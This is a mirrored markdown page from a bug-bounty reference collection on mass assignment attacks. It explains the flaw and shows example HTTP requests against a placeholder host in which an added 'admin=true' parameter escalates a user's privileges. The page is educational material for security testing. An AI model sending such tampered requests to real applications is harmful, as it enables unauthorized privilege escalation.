ch0ic3/AllAboutBugBounty
1
0
Fork 0
mirror of https://github.com/daffainfo/AllAboutBugBounty.git synced 2025-01-18 17:18:50 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity
e989f9910c
AllAboutBugBounty/Misc/Mass Assignment.md
daffainfo a2c07348e3 Update structure each readme
2022-06-15 17:38:42 +07:00

695 B
Raw Blame History

Mass Assignment Attack

Introduction

Occurs when an app allows a user to manually add parameters in an HTTP Request & the app process value of these parameters when processing the HTTP Request & it affects the response that is returned to the user. Usually occurs in Ruby on Rails / NodeJS

How to exploit

  • Normal request
POST /editdata
Host: vuln.com

username=daffa

HTTP/1.1 200 OK
...

username=daffa&admin=false
  • Modified Request
POST /editdata
Host: vuln.com

username=daffa&admin=true

HTTP/1.1 200 OK
...

username=daffa&admin=true

References